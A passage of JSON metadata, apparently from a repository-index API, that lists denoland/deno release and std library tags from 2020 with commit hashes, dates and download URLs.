denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHu